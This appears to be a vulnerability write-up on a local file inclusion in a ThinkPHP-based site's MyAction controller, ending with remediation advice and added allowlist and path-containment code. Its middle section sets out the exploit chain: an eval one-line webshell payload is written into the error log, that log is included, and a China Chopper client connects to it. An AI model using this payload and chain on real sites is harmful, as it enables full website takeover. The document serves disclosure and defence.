A local file inclusion can be used to get a webshell and directly take control of the entire website. Vulnerable file: core\Lib\Action\Home\MyAction.class.php
    <?php
    class MyAction extends HomeAction {
        public function index() {
            $this->show();
        }

        public function show() {
            // $id is taken straight from the query string
            $id = !empty($_GET['id']) ? $_GET['id'] : 'hot';
            $this->display('My_' . trim($id)); // vulnerability
        }
    }
    ?>
The inclusion point:
    public function fetch($templateFile = '', $charset = '', $contentType = 'text/html', $display = false) {
        $GLOBALS['_viewStartTime'] = microtime(TRUE);
        if (null == $templateFile)
            // a null template name returns directly without any output
            return;
        if (empty($charset)) $charset = C('DEFAULT_CHARSET');
        // page character encoding
        header("Content-Type:" . $contentType . "; charset=" . $charset);
        header("Cache-control: private"); // supports going back to the page
        // page cache
        ob_start();
        ob_implicit_flush(0);
        if (!file_exists_case($templateFile))
            // automatically locate the template file
            $templateFile = $this->parseTemplateFile($templateFile); // key function: it only processes the name of the template file to include; we look at it below
        $engine = strtolower(C('TMPL_ENGINE_TYPE'));
        if ('php' == $engine) {
            // break the template variable array out into independent variables
            extract($this->tVar, EXTR_OVERWRITE);
            // load the PHP template directly
            include $templateFile;
        } elseif ('think' === $engine && $this->checkCache($templateFile)) {
            // Think template engine with a valid cache: break out the variables and load the template cache
            extract($this->tVar, EXTR_OVERWRITE);
            // load the template cache file
            include C('CACHE_PATH') . md5($templateFile) . C('TMPL_CACHFILE_SUFFIX');
        } else {
            // the template file needs to be recompiled; supports third-party template engines
            // call the template engine to parse and output
            $className = 'Template' . ucwords($engine);
            require_cache(THINK_PATH . '/Lib/Think/Util/Template/' . $className . '.class.php');
            $tpl = new $className;
            $tpl->fetch($templateFile, $this->tVar, $charset);
        }
        $this->templateFile = $templateFile;
        // get and clear the output buffer
        $content = ob_get_clean();
        // template content replacement
        $content = $this->templateContentReplace($content);
        // layout template parsing
        $content = $this->layout($content, $charset, $contentType);
        // output the template file
        return $this->output($content, $display);
    }
How the name of the included file is processed:
    private function parseTemplateFile($templateFile) {
        if ('' == $templateFile) {
            // empty template file name: locate it according to the default rules
            $templateFile = C('TMPL_FILE_NAME');
        } elseif (strpos($templateFile, '@')) {
            // operation template of another theme; must contain the module name, for example blue@User:add
            $templateFile = TMPL_PATH . str_replace(array('@', ':'), '/', $templateFile) . C('TMPL_TEMPLATE_SUFFIX');
        } elseif (strpos($templateFile, ':')) {
            // operation template of another module
            $templateFile = TEMPLATE_PATH . '/' . str_replace(':', '/', $templateFile) . C('TMPL_TEMPLATE_SUFFIX');
        } elseif (!is_file($templateFile)) {
            // another operation template of the current module
            $templateFile = dirname(C('TMPL_FILE_NAME')) . '/' . $templateFile . C('TMPL_TEMPLATE_SUFFIX');
        }
        if (!file_exists_case($templateFile))
            throw_exception(L('_TEMPLATE_NOT_EXIST_') . '[' . $templateFile . ']');
        return $templateFile;
    }
With the inclusion point in hand, we need a file that contains our malicious code. We use ThinkPHP's error logging function for this.

[Screenshot: triggering an error]
[Screenshot: the log file]

Use the two features mentioned above:
1. include any file
2. errors are written to the log
3. combine these with ThinkPHP template syntax to construct a one-line webshell: {~eval($_POST[x])}

Write the one-liner:

[Screenshot: triggering an error]
[Screenshot: the log file]

Include the one-liner:

Connect with the "Kitchen Knife" (China Chopper) client:
Solution: As for repairing the program, on the secondary developer's side the template parameter should not be user-controllable. On the ThinkPHP side, the processing of template file names and paths must be improved.
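
One way to apply both halves of this fix, as an added example that is not code from ThinkPHP or from the affected application: the id is mapped through a fixed allowlist before it reaches display(), and the resolved template path is checked to still lie inside the template directory. The helper names my_template_name() and resolve_inside(), the allowlist contents, the '.html' suffix and the temporary directory layout are assumptions made for the demonstration.

```php
<?php
// Added example. Hypothetical helpers, not part of ThinkPHP.

/** Map the untrusted id to a template name taken from a fixed allowlist. */
function my_template_name($id, array $allowed, $default = 'hot') {
    $id = is_string($id) ? trim($id) : '';
    // Strict comparison: only exact, known names pass, so '/', '..', '@'
    // and ':' can never reach the template name parser.
    return 'My_' . (in_array($id, $allowed, true) ? $id : $default);
}

/** Resolve a template file and refuse anything outside $baseDir. */
function resolve_inside($baseDir, $name, $suffix = '.html') {
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name . $suffix); // false if missing
    if ($base === false || $path === false) {
        return null;
    }
    // After ../ and symlink resolution the file must still sit under the base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo layout: a template directory with a log directory beside it.
$root = sys_get_temp_dir() . '/tpl_demo_' . getmypid();
@mkdir($root . '/Tpl', 0700, true);
@mkdir($root . '/Logs', 0700, true);
file_put_contents($root . '/Tpl/My_hot.html', 'hot list');
file_put_contents($root . '/Logs/app.log', 'constructed log line');

$allowed = array('hot', 'new'); // assumed list of the real My_* views

// A known id is kept; a traversal attempt falls back to the default view.
var_dump(my_template_name('new', $allowed));
var_dump(my_template_name('../../Logs/app.log', $allowed));

// A template inside the base resolves; the log file next to it does not.
var_dump(resolve_inside($root . '/Tpl', 'My_hot'));
var_dump(resolve_inside($root . '/Tpl', '../Logs/app', '.log'));

// Remove the constructed files again.
unlink($root . '/Tpl/My_hot.html');
unlink($root . '/Logs/app.log');
rmdir($root . '/Tpl');
rmdir($root . '/Logs');
rmdir($root);
```

In show(), the first helper would wrap the value passed to display(); the second belongs wherever the framework turns a template name into a path, immediately before the include.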